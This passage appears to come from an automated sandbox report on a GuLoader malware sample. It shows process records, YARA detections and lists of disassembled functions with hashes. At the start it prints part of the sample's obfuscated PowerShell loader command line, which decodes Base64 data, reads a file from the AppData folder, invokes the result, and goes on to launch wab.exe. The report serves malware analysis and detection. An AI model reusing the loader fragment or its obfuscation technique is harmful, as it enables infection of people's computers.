ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
                                        Imagebase:0x1e0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2573987215.0000000008B40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2561974227.0000000005F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2574516885.0000000009DEA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:12:25:13
                                        Start date:23/05/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:12:25:38
                                        Start date:23/05/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe00000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FF848F1C856 Relevance: .5, Instructions: 474COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f94cac51a84157eca01cb09276c5d51155fe85b6e7a1b3e4c25cc6430c06d893
                                          • Instruction ID: 005f058318ad6a02d093af6ff6de7660a2b68f4acd4c2ec7f147bea77b9e56cc
                                          • Opcode Fuzzy Hash: f94cac51a84157eca01cb09276c5d51155fe85b6e7a1b3e4c25cc6430c06d893
                                          • Instruction Fuzzy Hash: 28F1A33090CA8D8FEBA8EF28C8557E977D1FF54350F04426AD84DC72D1DB3899458B86
                                          Function 00007FF848F1D602 Relevance: .5, Instructions: 460COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 842e9bc22e9dfb823cfbdf7ba8d3bf50ad134f0dd3e0b675b280e7a164315b0a
                                          • Instruction ID: 70bf9c8fed0ca23cc1c7686b5b45093c95e1daec4129136b2feda69ef60edcfe
                                          • Opcode Fuzzy Hash: 842e9bc22e9dfb823cfbdf7ba8d3bf50ad134f0dd3e0b675b280e7a164315b0a
                                          • Instruction Fuzzy Hash: A6E1B13090CA8E8FEBA8EF28C8557E977E1EF54350F14426ED84DC7691DF78A9418B81
                                          Function 00007FF848FE4B35 Relevance: .4, Instructions: 434COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2755080186.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 924868270108b68b4adbe708c91a78e394ff3b6ea6698930116a9e07d13a6f5e
                                          • Instruction ID: 0c8f4253cfbd90fabfbd24a4d731826ccd17112e7c5001b7d4b57255428097aa
                                          • Opcode Fuzzy Hash: 924868270108b68b4adbe708c91a78e394ff3b6ea6698930116a9e07d13a6f5e
                                          • Instruction Fuzzy Hash: 15D13231D1EE8A5FE7A6AB2858555B57BE0EF66354F0800FED04CC71D3EB1CA8058359
                                          Function 00007FF848FE9D6E Relevance: .3, Instructions: 314COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2755080186.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0888dd33fb3f2c32dbbd4a9dac18e1842a8660085b47b946907c7c71f5263574
                                          • Instruction ID: 91fa5fd346b27f51760770d5d4bd532cf0dea00226713cd726df9608806a9701
                                          • Opcode Fuzzy Hash: 0888dd33fb3f2c32dbbd4a9dac18e1842a8660085b47b946907c7c71f5263574
                                          • Instruction Fuzzy Hash: 6EA1E431F0EA8B4FEB9AEB2854552B876E1EF54390F4801BAC54DC35D3DF1CA8408369
                                          Function 00007FF848FE9E67 Relevance: .2, Instructions: 150COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2755080186.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccf567c9dfaf0e7f6e9d8730085a8d97d525fdd4868c253cb22134406d58d56a
                                          • Instruction ID: c9dbc7064c221b64460f73844b83d93f764bfd86ab2226567e06bc09a1855fbc
                                          • Opcode Fuzzy Hash: ccf567c9dfaf0e7f6e9d8730085a8d97d525fdd4868c253cb22134406d58d56a
                                          • Instruction Fuzzy Hash: 3F410531E1EACA4FE796EB2858542B976E1EF45390F4900BAD10DD32D2DF1CAC44836A
                                          Function 00007FF848F13945 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction ID: 1d263df139ee799e0221237225f3f4c5236a0ef0a202e971a2d53809691abd9b
                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction Fuzzy Hash: 2501677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056EE58AC3695D736E881CB45

                                          Non-executed Functions

                                          Function 00007FF848F18800 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2754327969.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: N_^$N_^$N_^$N_^
                                          • API String ID: 0-3900292545
                                          • Opcode ID: 8479b95cffe73d918b44169d3daeb7b06e0ae8e93c2299a7ce5571949ce308e8
                                          • Instruction ID: f8afdaddedde69f77c34a6f8dcff3b2d7734c2954b8fa60ff21f73e87ba022c6
                                          • Opcode Fuzzy Hash: 8479b95cffe73d918b44169d3daeb7b06e0ae8e93c2299a7ce5571949ce308e8
                                          • Instruction Fuzzy Hash: 7931C973C1DED28EE36F5738A9A10F16B50EF51FA6F5901AAC0980A0D3EF286C16C745

                                          Executed Functions

                                          Function 07A8A7AE Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.qk
                                          • API String ID: 0-1364774114
                                          • Opcode ID: be9d4cc994d5ee555cc0abfe2c8adfa4e270adfb8a04bf31bfc902832e0a0065
                                          • Instruction ID: 213ae9679d3120d44f8781ebbf675792550cff586d3d8d7d0f97c74c64773cca
                                          • Opcode Fuzzy Hash: be9d4cc994d5ee555cc0abfe2c8adfa4e270adfb8a04bf31bfc902832e0a0065
                                          • Instruction Fuzzy Hash: 1E31F3B4B40204ABD304A764CA55BAE7AA3EFD4310F10C869FA016F791CF76AC05CBA1
                                          Function 07A88918 Relevance: 16.0, Strings: 12, Instructions: 1032COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.qk$-qk
                                          • API String ID: 0-1497453550
                                          • Opcode ID: a855ced158b636f52458578cd14f767437889defdb75beff99579a02a2308d6b
                                          • Instruction ID: 677a98582be38f28dd08bcc442655395177da6215a956c186916b02aa5c11a3a
                                          • Opcode Fuzzy Hash: a855ced158b636f52458578cd14f767437889defdb75beff99579a02a2308d6b
                                          • Instruction Fuzzy Hash: AC92C2B0B11305CFDB64EB68C950B6ABBB2EFC5300F1484AAD9199B355CB35EC85CB91
                                          Function 07A8A388 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.qk$-qk
                                          • API String ID: 0-3793507390
                                          • Opcode ID: c4c80781da958392e4213240bc6ad784bd866d94f867955663c4c94d501a308c
                                          • Instruction ID: 0530091fe2c1c990255573a6d7fb7e74918a2c894c4f8514768dc80ea04ca237
                                          • Opcode Fuzzy Hash: c4c80781da958392e4213240bc6ad784bd866d94f867955663c4c94d501a308c
                                          • Instruction Fuzzy Hash: 5FD19CB0B402099FC714EB68C650B9EBBB2AFC4310F15C86AE9156F355CB75EC46CBA1
                                          Function 07A80638 Relevance: 7.9, Strings: 6, Instructions: 369COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-1480752206
                                          • Opcode ID: 6b34eeb9db77ad3fb696a253a0e55af8a69e9a13c4a81cd9b1986f3313d8c79d
                                          • Instruction ID: 8c6eed47dd14f271a050e5dd345a486d69135771a445ef06b2c06f36099c7ee0
                                          • Opcode Fuzzy Hash: 6b34eeb9db77ad3fb696a253a0e55af8a69e9a13c4a81cd9b1986f3313d8c79d
                                          • Instruction Fuzzy Hash: 61C15EB2700206CFDB64AB68D95067BBBF6EFD1311F14847AD865CB251DB31C849CBA2
                                          Function 07A8932B Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$x.qk$x.qk$-qk
                                          • API String ID: 0-2645119150
                                          • Opcode ID: 3ae4de424d2da4806257c4b0328f91220a4a04829f78c8a61ccf7dcd45959a63
                                          • Instruction ID: dc49c53b4bef55f3319d711d43182011781629d3f93edd5a4d4399aa3eeeda8f
                                          • Opcode Fuzzy Hash: 3ae4de424d2da4806257c4b0328f91220a4a04829f78c8a61ccf7dcd45959a63
                                          • Instruction Fuzzy Hash: 4BF1A1B0B402159FD764DB18CA50BAABBB7AF84300F1088A9D509AF795CB35ED85CF91
                                          Function 07A8A36A Relevance: 6.5, Strings: 5, Instructions: 278COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$x.qk$-qk
                                          • API String ID: 0-189680634
                                          • Opcode ID: 0e9e2a824ffabfd6c8a99bce8638683483eb36138de38775bec745e000e3c115
                                          • Instruction ID: fa2e2cfefb5043d900b8977f705f78463060c99dd53244c5e751e2e1b6a4608e
                                          • Opcode Fuzzy Hash: 0e9e2a824ffabfd6c8a99bce8638683483eb36138de38775bec745e000e3c115
                                          • Instruction Fuzzy Hash: FEB1B0B4A002059FCB14EF64C594B9DBBB2EFC8314F15C86AE8256F395CB35E846CB91
                                          Function 07A85FC0 Relevance: 6.4, Strings: 5, Instructions: 168COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$$]q$$]q$$]q
                                          • API String ID: 0-2353078639
                                          • Opcode ID: 353275aafbdddb2ccf6cb565d3c3043cf09e6ade7fdfb2d0c56486fc5892e3bb
                                          • Instruction ID: 4284ac02c9baf22e2b4f38eabb0d2d54d62710cb1278e79104709a1916963e77
                                          • Opcode Fuzzy Hash: 353275aafbdddb2ccf6cb565d3c3043cf09e6ade7fdfb2d0c56486fc5892e3bb
                                          • Instruction Fuzzy Hash: F05135B1704346DFEBA9AF68C950566BBF1AFC2210F18C4ABD8A58B253DB35C800C756
                                          Function 07A87808 Relevance: 5.9, Strings: 4, Instructions: 944COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84~l$84~l$tP]q$tP]q
                                          • API String ID: 0-1199993865
                                          • Opcode ID: 438719426475659df456b299ae61bd40b2b761247c7f53fbbf958723ceaf22a3
                                          • Instruction ID: c76f617c111254d4cc4a9bdf492e99379c9943ae4f17bf111d35acb2f55abc17
                                          • Opcode Fuzzy Hash: 438719426475659df456b299ae61bd40b2b761247c7f53fbbf958723ceaf22a3
                                          • Instruction Fuzzy Hash: 2782B0B0B50205CFCB54DBA8CA40A6ABBB2EFC5304F64C4A9D9159F355CB36EC46CB91
                                          Function 07A86378 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84~l$tP]q
                                          • API String ID: 0-632405432
                                          • Opcode ID: 500e62afc789eb2b47f24aac17cd4afda40c7fc576a8a73d24ba81cfa1c3664f
                                          • Instruction ID: fbf3c5b46e5098b7a8cde0db0147e002a12276ee3de69b2dcbcb9080fefe8f90
                                          • Opcode Fuzzy Hash: 500e62afc789eb2b47f24aac17cd4afda40c7fc576a8a73d24ba81cfa1c3664f
                                          • Instruction Fuzzy Hash: 005154B46093819FDB669B24C951A29BFB1EF86210F0DC0DBD4A48F2A3C731DC45C7A2
                                          Function 07A88570 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.qk
                                          • API String ID: 0-1364774114
                                          • Opcode ID: 09057ac0c02d2726b7aaba65cd834642e3a06f070a07ddd375c3f776d794873f
                                          • Instruction ID: e79a6028eea79682fb8c8b6cbc51121b2febd091696c9715a3ce12368be4c327
                                          • Opcode Fuzzy Hash: 09057ac0c02d2726b7aaba65cd834642e3a06f070a07ddd375c3f776d794873f
                                          • Instruction Fuzzy Hash: 4B91A2B0B502049FD714DB64CA54BAE7BF2AF88300F548869E914AF795CF76EC44CBA1
                                          Function 07A88548 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: x.qk
                                          • API String ID: 0-1364774114
                                          • Opcode ID: 91f431c2d61b34d2489375482f8ddc2b9affeb0ac603bfa8252dd655b54ab595
                                          • Instruction ID: a8aefae3c309b05ecebff84305443a3241c6fb818524713144915a516a401fa0
                                          • Opcode Fuzzy Hash: 91f431c2d61b34d2489375482f8ddc2b9affeb0ac603bfa8252dd655b54ab595
                                          • Instruction Fuzzy Hash: 9F91C4B4B102019FD714DB64CA84B9DBBF2BF88304F548469E914AF791CB36EC48CBA1
                                          Function 07A808C2 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $]q
                                          • API String ID: 0-1007455737
                                          • Opcode ID: cd51519d98bc3158a8d90bbc837fdeafec5779500a6814284614c24f77edc741
                                          • Instruction ID: f17792496a787f8d067816e938f5a7815d13d7ca67f7d509d6a656dbf8a98d7d
                                          • Opcode Fuzzy Hash: cd51519d98bc3158a8d90bbc837fdeafec5779500a6814284614c24f77edc741
                                          • Instruction Fuzzy Hash: F17169B12043469FC765AF29C450767BFB5EFC2310F1984ABE8A4CB262D735D849C7A2
                                          Function 07A881BD Relevance: .5, Instructions: 483COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ba4e244ccafd90f92a62dc953236b137ba1bba44d99e464fe8a60e8d0f11866
                                          • Instruction ID: 5402a3f82bc66f9dc9d069462a96cc1c34281cf6bd9be6b514b83835d00195a0
                                          • Opcode Fuzzy Hash: 8ba4e244ccafd90f92a62dc953236b137ba1bba44d99e464fe8a60e8d0f11866
                                          • Instruction Fuzzy Hash: 21128CB4A10205CFDB54DB98C680E6ABBB2FF84304F54C4A9E9259F355CB76EC46CB90
                                          Function 07A82CAD Relevance: .1, Instructions: 135COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c07d424589bb16b4ef352d8a1719a613c03ccb6786709a7b92607ea59a972b77
                                          • Instruction ID: c2a79bf00b66fe9d05b534751f3ad635051d0fa55de1bd865caaec41956c4166
                                          • Opcode Fuzzy Hash: c07d424589bb16b4ef352d8a1719a613c03ccb6786709a7b92607ea59a972b77
                                          • Instruction Fuzzy Hash: 67419CF2B001148BCB65A7789A117BABFE1EFD1310B10886AD6118B395CE32C805C7F5
                                          Function 07A863D4 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a681fec61f67809aff177f1b87a1e1e62b2ffeddbe97504fa3083fb06aec5f51
                                          • Instruction ID: 12dfbdc7161ad7658ffd2e14d5b4f3ddc9c25120aefb0ce105667f1df346851c
                                          • Opcode Fuzzy Hash: a681fec61f67809aff177f1b87a1e1e62b2ffeddbe97504fa3083fb06aec5f51
                                          • Instruction Fuzzy Hash: 97F05E341493818FD3529B24C954A65BFB1AF82215F1DC0EFD0988F5A3C735988AC711
                                          Function 07A861A4 Relevance: .0, Instructions: 24COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff384ea449172ae30983984fb32af64a6d69c424bfbc3d523e7dfe22850b4f4e
                                          • Instruction ID: 4014912b84c811940f46c9f6863cd9fe9265fb4d4573bfccffb662fb0cf8e90e
                                          • Opcode Fuzzy Hash: ff384ea449172ae30983984fb32af64a6d69c424bfbc3d523e7dfe22850b4f4e
                                          • Instruction Fuzzy Hash: 47F065B510D3919FDB979F24CC51411BF72AF9320131A81CED9A19F1A7C625A816C752

                                          Non-executed Functions

                                          Function 07A85300 Relevance: 12.9, Strings: 10, Instructions: 398COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-267665775
                                          • Opcode ID: ba8f708b0e427c1fa54fc4a9bf3499372432810bb012f36d3b8b2b1891a4bbaf
                                          • Instruction ID: 77acd7c7ea03098851790c22a85693d889bf34d17e45f2d12ac5fda069e06105
                                          • Opcode Fuzzy Hash: ba8f708b0e427c1fa54fc4a9bf3499372432810bb012f36d3b8b2b1891a4bbaf
                                          • Instruction Fuzzy Hash: FDC16BB1F002068FCB69AB78C95027A7BE6EFC1211F28847ADC25CB250DB31C955C7A1
                                          Function 07A84D30 Relevance: 12.8, Strings: 10, Instructions: 323COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2570672584.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7a80000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
